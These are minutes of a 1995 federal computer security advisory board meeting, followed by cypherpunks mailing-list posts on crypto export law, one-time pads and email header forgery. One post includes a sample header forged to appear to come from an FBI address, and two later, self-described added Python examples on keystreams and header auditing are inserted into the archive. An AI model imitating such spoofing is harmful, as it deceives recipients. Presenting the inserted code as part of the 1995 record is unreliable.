that OMB will not go that far; however, Appendix III addresses
the risks for agencies to use as a guideline for security
considerations.  Board members noted that agency visits to
senior management regarding security plans, as was conducted
in the 1989-1990 timeframe, seemed successful.  Mr. Springer
said that the Federal Managers Financial Integrity Act
provides oversight of the requirement for agencies to prepare
new plans.  Mr. Springer agreed to brief the Board at its
September meeting to further discuss the comments received and
current status.  He mentioned that the final document "NII
Security: The Role of Federal Government," would be out soon
and Board members would receive copies.  (ACTION - SECRETARY).


Defensive Information Warfare & Unclassified Government and
Private Sector

Mr. Martin Hill, Deputy Director for Information Warfare
Programs, Office of the Assistant Secretary of Defense,
briefed the Board on Information Warfare (IW) from a DoD
perspective. He said that commanders should not depend on
information and information systems that they cannot rely on. 
He used the example of Desert Storm, which was won through
the use of intelligence; Iraq, in effect, lost the war before
it even began.  Mr. Hill said that IW is driven by daily
attacks on U.S. computer networks.  The national security
construct is changing because DoD utilizes commercial sector
security and shares their vulnerabilities.  The DoD
unclassified definition of IW is "Actions taken to achieve
information superiority in support of national military
strategy by affecting adversary information and information
systems while leveraging and protecting our information and
information systems."  Some of the areas that need defending
are: leadership; command facilities; integrated air defense
and controls; computers, software, data bases, and displays;
power production sources; and links to media. The U.S. IW
strategy is to:

-  Use U.S. technological superiority to provide the right
   information to the right place at the right time,

-  Aggressively defend against attacks on our information, and

-  Use offensive techniques to attain and maintain information
   superiority.

Mr. Hill also emphasized the need for and importance of
training.  He said they have assembled "Red Teams" made up of
DoD personnel that converge on other DoD systems to determine
their vulnerabilities.  When asked how DoD could best
communicate their requirements to the commercial sector, Mr.
Hill said that they conduct seminars and "war games" which are
both attended by industry.  (See Reference #1.)


X/Open Security Branding Proposal

Mr. Peter Callaway, Senior Security Technologist for IBM,
provided the Board with an update on the X/Open security
branding proposal.  Mr. Callaway was speaking from three
perspectives: IBM (a member of X/Open), X/Open, and as a user. 
He said that X/Open feels they have the appropriate and proven
experience by setting industry standards and performing
conformance branding.  X/Open has the commitment of vendors to
build products to their specifications with regard to
technical plans established with vendor cooperation and
commitment to product follow-through.  X/Open Branding is a
certification scheme for conformance verification, not
evaluation. Currently, X/Open branding requires evidence of
successful execution of a test suite where appropriate test
suites are available.  It requires a conformance statement
questionnaire and a trademark license agreement to be
completed by the applicant.  (See Reference # 2.)


Security Policy Board (SPB) Update

Ms. Vicki LaBarre, Security Policy Board (SPB) Staff, briefed
the Board on the progress of the SPB.  Ms. LaBarre reminded
the Board of the role of the SPB as chartered by Presidential
Decision Directive (PDD)-29.  The SPB and Security Policy
Forum are jointly chaired by DoD and intelligence community
members, but their members include non-DoD and
non-intelligence community representatives. Ms. LaBarre
relayed that the SPB considers itself an "honest broker" to
identify issues and positions from all parties on key
questions.  She said that the fundamental question is whether
the executive branch needs a single, consolidated INFOSEC
policy making mechanism.

If a consolidated INFOSEC policy making mechanism is needed: 
Can the existing SPB structure created by PDD-29 meet that
need?

-  If yes: how should an information systems security
   committee be chartered and constituted?

-  If not: how could/should the SPB/SPF be modified to become
   an effective INFOSEC policy mechanism?  What other existing
   entity in the executive branch could act, or be modified to
   act as the executive branch's INFOSEC policy making
   apparatus?  What kind of new entity could be created to
   meet this policy making need?

If a consolidated INFOSEC policy making mechanism is not
needed:

-  How can the existing INFOSEC policy and advisory boards,
   committees, forums, etc., be made to more effectively
   identify, prioritize, resource and act on major INFOSEC
   issues and vulnerabilities affecting the national interest?

-  Are executive branch INFOSEC resources adequate to provide
   for acceptable security for government information systems?

-  Are existing INFOSEC resources appropriately located and
   distributed within the executive branch?

Recently the SPB staff convened a special working group to
draft a resolution to call for compiling a list of major
INFOSEC issues.  The matter will be discussed at the Security
Policy Board Forum meeting on June 23.  In summary, Ms.
LaBarre emphasized that we must do a better job of INFOSEC
governmentwide which is doable if everyone works together for
the common good.

Throughout Ms. LaBarre's presentation, some Board members
expressed serious concerns about many aspects of the SPB's
charter, the first SPB staff report and their present stance
on the effort of a single policy making mechanism.  Some Board
members expressed the view that the initial report was not
clear with regard to what kind of information would encompass
"national interest." She said that the first report was purely
a "think piece" to stimulate discussion, which it has done.
(See Reference #3.)


Commercial Key Escrow Update

Mr. Steve Walker, President, Trusted Information Systems
(TIS), presented the Board with an update of TIS' Commercial
Key Escrow (CKE) activities.  Mr. Walker recently met with
senior management of National Semiconductor Corporation.  They
discussed a proposal to use CKE in an escrowing approach
called Commercial Automated Key Escrow (CAKE) in which the CKE
system has been modified to work with National's PersonaCard
cryptographic hardware tokens. Mr. Walker believes that this
approach meets the needs expressed by the Vice President. 
CAKE does the following:

1. It removes all very strong cryptography from software.

2. It uses these special CAKE tokens to automatically escrow
   an encrypted copy of every message key within the message
   envelope itself, in a special Data Recovery Field (DRF)
   consisting of the message key and Data Recovery Center
   (DRC) and token identifiers, encrypted with the public key
   of a Designated DRC.

3. It provides access to DRFs via the private key of the DRCs,
   and allows any user to establish their own DRC to safeguard
   corporate information.

4. It uses well known cryptographic algorithms such as DES,
   triple DES and RSA, instead of algorithms such as Skipjack.

5. Finally, it gives American computer and communications
   industries the ability to easily export strong and very
   strong encryption as part of their information highway
   products.

Mr. Walker briefly discussed the software binding issue which
has been put off by implementation into the PCMCIA card but,
it still needs to be tried and a software vendor is being
sought to do so.  The card implementation is aimed at files
and e-mail, not telephony.  There is initial concern with
regard to cost, however, it is tamper proof and cannot be
distributed over the Internet.  Mr. Walker said they are
seeking export approval with DES and CKE and hopes for a
position resolution in the near future. (See Reference #4.)

The meeting recessed at 5:20 pm.




Thursday, June 8, 1995

SI-PMO Action Plan Briefing

Mr. Al Williams, Acting Director of the Security
Infrastructure Program Management Office (SI-PMO) at GSA,
updated the Board on the activities and progress of the
SI-PMO.  He discussed some of the near term goals: identifying
and resolving critical policy issues related to support
multiple technologies, developing a security architecture,
defining user-to-user and user-to SI specifications, and
establishing a formal liaison between the SI-PMO and the
Canadian Government.  Board members asked about milestones. 
Mr. Williams directed members to the summary of the near-term
actions and milestones in the Action Plan appendix.  When
asked who has received the Action Plan, Mr. Williams replied
that it was distributed to the Government Information
Technology Services Group, the National Information
Infrastructure Security Issues Forum, the Electronic Commerce
Acquisition Program Management Office, the E-Mail Program
Management Office, NSA, NIST, and the PKI Steering Committee.
The Board commended Mr. Williams for working an issue with a
real time frame.  Mr. Williams was invited to come back and
update the Board as he feels appropriate.  (See Reference #5.)


Common Criteria Update

Dr. Stu Katzke, Chief, NIST Computer Security Division,
updated the Board on the Common Criteria (CC) effort.  He
discussed the Common Criteria for Information Technology
Security Evaluation workshop on May 11-12 in Ottawa, Canada. 
Approximately 40 people from Europe, Canada, the U.S., and
Japan participated in the workshop.  The workshop served to
allow the CC Editorial Board to:

-  provide general information on the comments received and
   the planned changes to the document based on these
   comments; and

-  receive added clarifications on the reviewers' comments on
   the document so they can update the document to reflect the
   expert opinions.

The number of assurance levels and where they are were
discussed; however, that issue is not as high on the list as
the six key global issues below:

1. Document Organization - understandability and usefulness;

2. Extensibility of Requirements - support of ITSEC is
   unclear;

3. Extensibility of CC - how to maintain the CC;

4. Protection Profile - relationship unclear;

5. Protection Profile - selection of requirements; and

6. Dependencies and Binding - completeness/correctness.

Dr. Katzke said that the NCSC plans to perform evaluation
trials by January of 1996.  (See Reference #6.)  Mr. Charlie
Baggett volunteered to brief the Board in September  on trial
evaluations.  (ACTION - SECRETARY AND MR. BAGGETT.)

The discussion then turned to the Board's March resolution
(95-2) which recommended to NIST and NSA that a statement be
made regarding the equivalence of C2-level evaluated products. 
Mr. Lou Giles of NSA briefed the Board on NIST and NSA's
response to that recommendation.  In July, NIST and NSA will
publicly clarify the relationship between TCSEC C2, ITSEC E2,
and CTCPEC T1 levels to encourage federal programs with
requirements for evaluated low assurance level products to use
trusted products evaluated at these levels.  NIST and NSA 
will publish a Bulletin in July 1995, which will describe a
structure for the selection and acceptability of these
products.  The Bulletin will include an appendix listing the
products evaluated  and in evaluation under each criteria. 
(See Reference #7.)

Mr. Giles used the phrase "selection preferences for C2
requirements."  Some Board members said that the word
preference takes away from equivalency and they are concerned
that the list of requirements is a preference list rather than
a menu.  Selection preferences for C2 requirements are
as follows:

-  C2 products on U.S. EPL;

-  Products under U.S. TCSEC Evaluation (C2);

-  FPC2/T1 products on Canadian EPL or
   FC2/E2 products on European EPL; and

-  Products under CTCPEC (FPC2/T1) or ITSEC (FC2/E2)
   Evaluation.

Some Board members are concerned that the list suggests that
U.S. products be used first, thereby implying that they are
better than other products.  In discussion, most Board members
recommended they order the products in rank of completed vs
non-completed.

Mr. Giles updated TTAP accomplishments.  To date the work
group has performed the following:

-  Drafted an SOW for TTAP Developmental Commercial Evaluation
   (Feb. 95);

-  Annotated outline for document on what it takes to be
   accredited under NVLAP (Mar. 95);

-  Drafted first suggested evaluator actions for TCSEC Class
   C2 provided to NVLAP for review (Apr. 95);

-  Drafted second suggested evaluator actions for TCSEC Class
   C2 (May 95); and

-  Drafted first Technical Review Board expectations of a team
   (May 95).

Future activities for TTAP include:

-  Contract for TTAP Developmental Commercial Evaluation
   (Jun/Jul 95);

-  Start TTAP Developmental Commercial Evaluation (Aug. 95);

-  Conduct lessons learned from contracted effort (May 96);
   and

-  Expect NVLAP to accredit several Labs (NLT Aug. 96).  (See
   Reference #8.)


Privacy Update [Statement by Mr. Robert Gellman omitted]


Discussion

During discussion time, Board members voted on and unanimously
approved the minutes of the March, 1995 meeting.

The Board engaged in a lengthy discussion concerning PDD-29
and the intent of the charter of the SPB.  Board members
debated the idea of a single policy focal point.  They also
debated the phrase in PDD-29 "National Security."  One Board
member reminded the Board of a Government Computer News
article that PDD-29 appears to be clouded as to whether the
PDD intended to include sensitive unclassified information in
addition to national security (i.e., classified/Warner
Amendment) information.  A motion was moved and seconded
directing the chairman to draft a letter to the Co-Chairs of
the SPB and the SPF, articulating the need for clarification
of PDD-29 and the SPB charter.  (ACTION-CHAIRMAN AND
SECRETARY.)


PKI Steering Committee Activities

Mr. Robert Rosenthal, Manager, NIST Protocol Security Group,
briefed the Board on the activities of the Public Key
Infrastructure (PKI) Steering Committee.  Three working groups
reside under the Committee: technical (chaired by IRS),
business and legal (chaired by Treasury), and users (chaired
by the SI-PMO).  The Steering Committee continues to liaise
with the Canadian and Swedish governments, the Internet
community, the American Bankers and American Bar Associations
and the U. S. Council for International Business.  The
Steering Committee is exploring the establishment of a
Cooperative Research and Development Agreement (CRDA) with
industry organizations to:

-  Research and Develop a PKI Interoperability Test Plan and
   a NIST PKI Test Facility;

-  Publish test procedures and lessons learned; and

-  Develop and Demonstrate Interoperable Certificate Services
   on a wide variety of Internetworked Communications
   Facilities.

Mr. Rosenthal said there are workshops and special projects
slated for the future to include a tri-sponsored PKI
Invitational Workshop Series by NIST, the Security
Infrastructure Program Management Office and MITRE.  Also
planned, are some interdivision projects such as: PKI, time
and attendance, travel, procurement, and others that will be
available on the "NISTNET." NISTNET is a campus-wide local
area network for NIST.  (See Reference #9.)


DISA/ARPA/NSA Memorandum Of Understanding Briefing

Mr. John Davis, Director, NSA's National Computer Security
Center, briefed the Board on the Memorandum Of Understanding
(MOU) between the Defense Information Systems Agency (DISA),
the Advanced Research Projects Agency (ARPA), and the National
Security Agency (NSA).  He said that ARPA and NSA are the
major INFOSEC research programs in government and the major
user of INFOSEC is DISA.  The Information Systems Security
Research Joint Technology Office was established by a
Memorandum Of Agreement (MOA) in March of 1995 and signed by
the Directors of ARPA/DISA/NSA to coordinate security research
efforts with a heavy reliance upon commercial technology.  The
following nine items were called out in the agreement: 1)
Strategic Planning, 2) Review and Coordinate, 3) Evaluate
Proposals, 4) Metrics, 5) Prototypes, 6) COTS, 7) Standards,
8) Crypto and 9) Public.  Mr. Davis said this is work in
progress and they are looking for useful results.  Vendors
will show their products at the NIST/NCSC National Information
Systems Security Conference (NISSC) in Baltimore in
October.  Mr. Davis stated that the intent is not to focus
only on DoD.  A Defense solution would be costly, therefore,
commercial products with built in security are needed.  (See
Reference #10.)


Public Comment [Omitted]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lee Tien <tien@well.com>
Date: Wed, 8 Nov 1995 01:45:26 +0800
To: cypherpunks@toad.com
Subject: Re:  forging headers (with more header information)
Message-ID: <199511071708.JAA25692@well.com>
MIME-Version: 1.0
Content-Type: text/plain



My apologies.  I followed Tim's advice and turned on verbose headers, and
this is what I got.

Lee


Return-Path: freeh@fbi.gov
Received: from nimitz.MIT.EDU (NIMITZ.MIT.EDU [18.80.0.161]) by well.com
(8.6.12/8.6.12) with SMTP id NAA20123 for <tien@well.sf.ca.us>; Tue, 24 Oct
1995 13:06:23 -0700
From: freeh@fbi.gov
Message-Id: <199510242006.NAA20123@well.com>
Received: from sgigate.SGI.COM by nimitz.MIT.EDU with SMTP
        (1.37.109.4/16.2) id AA00301; Tue, 24 Oct 95 16:07:08 -0400
Date: Tue, 24 Oct 95 16:07:08 -0400
Apparently-To: tien@well.sf.ca.us
X-UIDL: 814570964.056

> How difficult is it to forge headers?  How difficult is it to trace a
> message to the actual sender if the header is forged?

Not very difficult at all (to forge, that is).  This is a quick and dirty
example that should be somewhat traceable.  If you want pointers on how to
trace it, post the whole thing, including headers, to cypherpunks.

Louis





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Wed, 8 Nov 1995 02:04:48 +0800
To: cypherpunks@toad.com
Subject: Sign my own certificates?
Message-ID: <199511071736.JAA29605@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Oh jesus, I need to get myself a certificate for the netscape servers
at work.

All I need are three forms of identification, two written letters, an
authorized signature, $300, mailed and faxed, along with an e-mail
or two.

I think this is an amazing pain in the ass. Any way I could sign a
certificate by myself for myself and have it work with the netscape
products? 

Just curious,
Christopher





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Nov 1995 05:28:16 +0800
To: cypherpunks@toad.com
Subject: CYB_lip
Message-ID: <199511071543.KAA24880@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-7-95. Washrag:

   "Cyber Liberation."

      The future of American politics is being decided in
      semiconductor plants in Santa Clara, in the cluttered
      offices of all-night software designers in Redmond, and,
      of course, all over the Internet. "At some point in the
      not-very-distant future," says Newt Gingrich, "somebody
      is going to have encryption you can't break....
      Governments are not going to be able to stop it."

      This brave new world is closer than you think. It will
      drastically change the focus of politics because control
      will be extremely difficult, if not impossible. We're on
      the brink of a revolution that will make what the
      Republicans are doing this year look trivial beyond
      belief.

      The Internet has the potential to set us free -- to
      learn anything and do anything, whenever we want. No
      wonder politicians want to regulate it to death.

   CYB_lip  (7 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Nov 1995 00:02:39 +0800
To: cypherpunks@toad.com
Subject: NOT_nok
Message-ID: <199511071547.KAA25224@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-7-95. W$J, Page One lead:

   "The 'Intranet'. Internet Software Poses Big Threat to
   Notes, IBM's Stake in Lotus."

      Hundreds of firms are achieving similar groupware
      linkups with simpler, cheaper systems on the World Wide
      Web. Dubbed "Intranets," these private networks combine
      text, graphics and even video to distribute news, answer
      employee questions, update personnel records and connect
      far-flung workers. The Intranets link a total of about
      15 million workers. These private networks are far
      different from what most Internet fans see -- the public
      "home pages." These setups reside on company-controlled
      servers shielded from the public Web by a security
      "firewall."

      The Web has an "open" design that all programming
      developers can use in common, as opposed to the "closed"
      and proprietary designs of Lotus Notes, Novell's
      Groupwise and Microsoft's Exchange. That lets Intranets
      accept traffic from incompatible computers more
      readily, making it easier for customers and suppliers to
      tap in, and for users to draw data from old mainframes
      and minicomputers.

   NOT_nok  (10 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 8 Nov 1995 00:13:07 +0800
To: hallam@w3.org
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <9511070433.AA11349@zorch.w3.org>
Message-ID: <199511071551.KAA16700@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 
> >Were that the case, citizens couldn't sue to have provisions impacting
> >them enforced, but the fact of the matter is that they can.
> 
> Various treaties provide that various privileges will be granted to
> various citizens of the countries concerned. Do the treaties grant
> such privileges in this case? Just because there is a treaty on
> nuclear disarmament between the US and the USSR does not mean that
> you as a private citizen can press for enforcement through the
> courts if you think that the USSR is not performing.

No, but treaties permitting citizens of Canada to work in the U.S. are
enforceable in U.S. courts, and other similar treaties that have
personal impact are enforceable in court, such as tax treaties.

In the case of a treaty saying "you aren't breaking a third country's
laws if you transmit something that wouldn't be legal to say in that
country over its telecom lines", it's a personal rather than a national
impact and it could be enforced in a U.S. court.

> >> Perry's somewhat offensive language is not a substitute for an argument.
> 
> >Thank you for the ad hominem.
> 
> Perry used the phrase "lobotomized mongoloid judge" I think that this
> type of language is offensive and unnecessary.

To whom was I being offensive, Mr. Hallam, given that I was referring
to a theoretical non-extant personage? Or are you a charter member of
"lobotomized mongoloids for equal justice" or some such.

> Ad hominem is a perfectly valid form of argument where one is considering
> the reputation of the person making the statement.

Yes, but my reputation is irrelevant to whether or not you can be
prosecuted as a foreigner for the act of handing another foreigner
cryptographic software outside the U.S.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 8 Nov 1995 01:32:58 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <Pine.SUN.3.91.951107102406.21752D-100000@viper.law.miami.edu>
Message-ID: <m0tCrCj-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

: I am delighted to discover that there is a person in this world who reads 
: the ITAR more broadly than I do.  I can see how the ITAR could be read to 
: reach a Frenchman who sends crypto via email to a German that happens, 
: through no fault of his own, to be routed via New York; we might have to 
: talk about whether the scienter requirement would mean that M. Frenchman 
: knew or should have known about the routing.  [NB "could be read" does 
: not equal "should be read".]
: 
: Not even I, however, would imagine that any court anywhere, could read 
: the ITAR or the legislation authorizing it (which is more to the point) 
: as reaching two foreigners talking abroad, neither of whom is a US person.

I quite agree that no one can read the Arms Control Export Act as
authorizing the definition of export in the ITAR that requires, among
other things, that a foreign person get a license that the ACEA says
that he can't get, before disclosing cryptographic software to another
foreign person ``in the United States or abroad''.

The ITAR violates not only the first amendment to the United States
Constitution, it also violates the separation of powers doctrine.  But
it still says what it says.  (And that is why it is unconstitutional.)

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Koning               1695 <pkoning@chipcom.com>
Date: Wed, 8 Nov 1995 01:32:15 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Re: using pgp to make an otp
Message-ID: <309FBAB3@mailer2>
MIME-Version: 1.0
Content-Type: text/plain



Will it ever sink in that NO algorithm produces a "random" bitstring, and
therefore NO algorithm can be the driver of a one time pad?

The output of an algorithm is (at best) PSEUDOrandom.  While a stream
cypher constructed that way may be strong, it is NOT a one time pad and
does NOT share with one time pad the unique property of being absolutely
unbreakable from first principles.  (It may very well have the property that
it is too hard to break in practice -- if so it makes a useful cryptosystem.
But to call such a thing "OTP" indicates a fundamental misunderstanding.)

See the sci.crypt FAQ for more details.

     paul

 ----------
From: owner-cypherpunks
To: Adam Shostack
Cc: Alan.Pugh; cypherpunks
Subject: Re: using pgp to make an otp
Date: Monday, November 06, 1995 11:31PM

>       PGP output is not random enough to be used for a one time pad.
> The security of a OTP is *entirely* based on the quality of the random
> numbers; they should come from some strong generator.  Building good
> one time pads is tough, and usually not worth the effort.

No, however the output of "pgp +makerandom=XXX filename.dat" _IS_
random enough for an OTP.  The problem then becomes distributing this
data.

 -derek
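
The distinction drawn in Paul Koning's message above, worked through as an added example (not code from any list member): a keystream expanded from a short seed can only take as many values as there are seeds, while a pad of true random bits can take every value of the message length. The 16-bit seed, the SHA-256 counter construction and the two sample messages are assumptions chosen so the seed space can be enumerated.

```python
import hashlib
import secrets

SEED_BITS = 16  # deliberately tiny (constructed) so every seed can be tried


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def keystream(seed, n):
    """Expand a short seed into n bytes: SHA-256 in counter mode (toy)."""
    out = b""
    counter = 0
    while len(out) < n:
        block = seed.to_bytes(2, "big") + counter.to_bytes(4, "big")
        out += hashlib.sha256(block).digest()
        counter += 1
    return out[:n]


def seeds_explaining(ciphertext, candidate):
    """Seeds under which `ciphertext` would decrypt to `candidate`.

    At most 2**SEED_BITS keystreams exist, so almost every candidate
    plaintext has no seed at all and is ruled out by the ciphertext.
    """
    want = xor(ciphertext, candidate)
    return [s for s in range(2 ** SEED_BITS)
            if keystream(s, len(want)) == want]


def pad_explaining(ciphertext, candidate):
    """With a one-time pad, a pad exists for EVERY same-length candidate,
    and each such pad is exactly as likely as any other."""
    return xor(ciphertext, candidate)


def demo():
    real = b"meet at the pier"    # constructed sample plaintext
    decoy = b"stay home today!"   # constructed alternative, same length
    assert len(real) == len(decoy)

    # Algorithm-driven keystream: the ciphertext pins down the plaintext.
    seed = 0xBEEF
    stream_ct = xor(real, keystream(seed, len(real)))
    seeds_real = seeds_explaining(stream_ct, real)
    seeds_decoy = seeds_explaining(stream_ct, decoy)

    # One-time pad. secrets.token_bytes is only a stand-in for a physically
    # random pad: an OS generator is itself an algorithm, which is the
    # limitation the message describes.
    pad = secrets.token_bytes(len(real))
    otp_ct = xor(real, pad)
    decoy_pad = pad_explaining(otp_ct, decoy)

    return {
        "seeds_for_real": seeds_real,
        "seeds_for_decoy": seeds_decoy,
        "otp_decoy_roundtrip": xor(otp_ct, decoy_pad) == decoy,
        "otp_real_roundtrip": xor(otp_ct, pad_explaining(otp_ct, real)) == real,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Against the seeded keystream only the real message has a consistent seed; against the pad both messages are equally consistent with the ciphertext.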




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@cdale1.midwest.net>
Date: Wed, 8 Nov 1995 02:46:32 +0800
To: tien@well.com
Subject: Re:  forging headers (with more header information)
Message-ID: <43796.dsmith@[204.248.40.2]>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995 09:08:39 -0800, Lee Tien wrote:
>Return-Path: freeh@fbi.gov
>Received: from nimitz.MIT.EDU (NIMITZ.MIT.EDU [18.80.0.161]) by well.com
>(8.6.12/8.6.12) with SMTP id NAA20123 for <tien@well.sf.ca.us>; Tue, 24 Oct
>1995 13:06:23 -0700
>From: freeh@fbi.gov
>Message-Id: <199510242006.NAA20123@well.com>
>Received: from sgigate.SGI.COM by nimitz.MIT.EDU with SMTP
>        (1.37.109.4/16.2) id AA00301; Tue, 24 Oct 95 16:07:08 -0400
>Date: Tue, 24 Oct 95 16:07:08 -0400
>Apparently-To: tien@well.sf.ca.us
>X-UIDL: 814570964.056

Without having any access to anything but the headers, it looks like
you are an employee for SGI and sent the message from there.

Look at the last Received: header.  It went from sgi.com to mit.edu to
well.com and then to you.

Dave
----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(314)339-3814, "dsmith@midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/
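
The Received-chain reading described in this reply can be automated; the following is an added example, not part of any list member's message. The header block is the one quoted above with its continuation lines re-indented so they parse as folded headers, and the function names and the three checks are assumptions of this example.

```python
import re
from email import message_from_string

# Headers from the message quoted above (continuation lines re-indented).
SAMPLE_HEADERS = """\
Return-Path: freeh@fbi.gov
Received: from nimitz.MIT.EDU (NIMITZ.MIT.EDU [18.80.0.161]) by well.com
 (8.6.12/8.6.12) with SMTP id NAA20123 for <tien@well.sf.ca.us>; Tue, 24 Oct
 1995 13:06:23 -0700
From: freeh@fbi.gov
Message-Id: <199510242006.NAA20123@well.com>
Received: from sgigate.SGI.COM by nimitz.MIT.EDU with SMTP
        (1.37.109.4/16.2) id AA00301; Tue, 24 Oct 95 16:07:08 -0400
Date: Tue, 24 Oct 95 16:07:08 -0400
Apparently-To: tien@well.sf.ca.us
X-UIDL: 814570964.056

"""

HOP_RE = re.compile(r"from\s+(\S+)(?:\s+\(([^)]*)\))?\s+by\s+(\S+)", re.I)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
QID_RE = re.compile(r"\bid\s+(\S+?)[;\s]")


def parse_hops(raw):
    """Return Received hops oldest-first (each relay prepends its own line)."""
    msg = message_from_string(raw)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        flat = " ".join(value.split())          # undo header folding
        m = HOP_RE.search(flat)
        if not m:
            continue
        ip = IP_RE.search(m.group(2) or "")
        qid = QID_RE.search(flat)
        hops.append({
            "from": m.group(1).lower(),
            "by": m.group(3).lower(),
            "peer_ip": ip.group(1) if ip else None,   # address the relay saw
            "queue_id": qid.group(1) if qid else None,
        })
    return hops


def relay_path(hops):
    """Hosts the message passed through, origin first."""
    if not hops:
        return []
    return [hops[0]["from"]] + [h["by"] for h in hops]


def audit(raw):
    """Heuristic consistency checks; each finding is a lead, not proof."""
    msg = message_from_string(raw)
    hops = parse_hops(raw)
    notes = []
    # 1. The claimed sender domain should match the first relay's source.
    sender = msg.get("From", "").rsplit("@", 1)[-1].strip("> ").lower()
    origin = hops[0]["from"] if hops else ""
    if sender and origin and not (origin == sender
                                  or origin.endswith("." + sender)):
        notes.append(f"From domain {sender} does not match first relay {origin}")
    # 2. Each relay's "by" host should reappear as the next hop's "from".
    for earlier, later in zip(hops, hops[1:]):
        if earlier["by"] != later["from"]:
            notes.append(f"chain break between {earlier['by']} and {later['from']}")
    # 3. A Message-Id built from the final relay's queue id and host name
    #    was assigned on receipt, not by the sending client.
    mid = msg.get("Message-Id", "")
    last = hops[-1] if hops else None
    if (last and last["queue_id"] and last["queue_id"] in mid
            and mid.rstrip(">").lower().endswith("@" + last["by"])):
        notes.append(f"Message-Id was assigned by {last['by']} on receipt")
    return notes


if __name__ == "__main__":
    print(" -> ".join(relay_path(parse_hops(SAMPLE_HEADERS))))
    for note in audit(SAMPLE_HEADERS):
        print("finding:", note)
```

Only the topmost Received line, written by the recipient's own server together with the peer address it saw, is trustworthy; every line below it was supplied by upstream hosts and can be fabricated.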




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 8 Nov 1995 01:40:48 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCrCj-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951107120300.21752H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995, Peter D. Junger wrote:

> I quite agree that no one can read the Arms Control Export Act as 
>authorizing the definition of export in the ITAR that requires, among 
>other things, that a foreign person get a license that the ACEA says 
>that he can't get, before disclosing cryptographic software to another 
>foreign person ``in the United States or abroad''. 
> 
> The ITAR violates not only the first amendment to the United States 
> Constitution, it also violates the separation of powers doctrine.  But 
> it still says what it says.  (And that is why it is unconstitutional.) >

[Note that this small disagreement between PDJ and me should not obscure 
our larger areas of agreement...]

To reiterate my point in legalese:  any court construing the ACEA would
inevitably read the prohibition on "exporting" to a foreign person as not
applying where the nation lacks jurisdiction.  This is not even a case of
applying a construction to save the constitutionality of the statute
(since it could well take a narrower construction to do that).  It's just
common sense, which courts actually resort to on occasion. 

In short, in this particular case the ACEA, and by extension the ITAR,
doesn't "say what it says"  it "says what it must mean".  This is an
important way in which legal parsing differs from compiling... 

,,,,,

I'd be interested in hearing more about why you say the ITAR violates
separation of powers: because it gives the executive branch too much power
to define the elements of a criminal offense? 


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 8 Nov 1995 02:17:32 +0800
To: "Peter D. Junger" <junger@pdj2-ra.f-remote.cwru.edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCngd-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511071753.MAA00375@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter D. Junger" writes:
> : Where the hell did you get that idea? [that the ITAR applies to
> : foreigners abroad].
> 
> From Section 120.17 of the ITAR which provides:
> 
>  _Export_ means:
> 
>  . . . .
> 
>  (4) Disclosing (including oral or visual disclosure) or transfering
>  technical data to a foreign person, whether in the United States or
>  abroad . . . .

That can't possibly be considered under U.S. law to apply to
foreigners talking to foreigners abroad, and if you are really a
lawyer you should know that the mere fact that the law doesn't mention
its jurisdiction doesn't make it unlimited. The statutes of New York
State say that I can be prosecuted for running a red light. Nowhere
at all do they say that the red light must be in New York State, but I
suspect that it would be completely impossible for the NY State
attorney general to get any court, in New York State or elsewhere, to
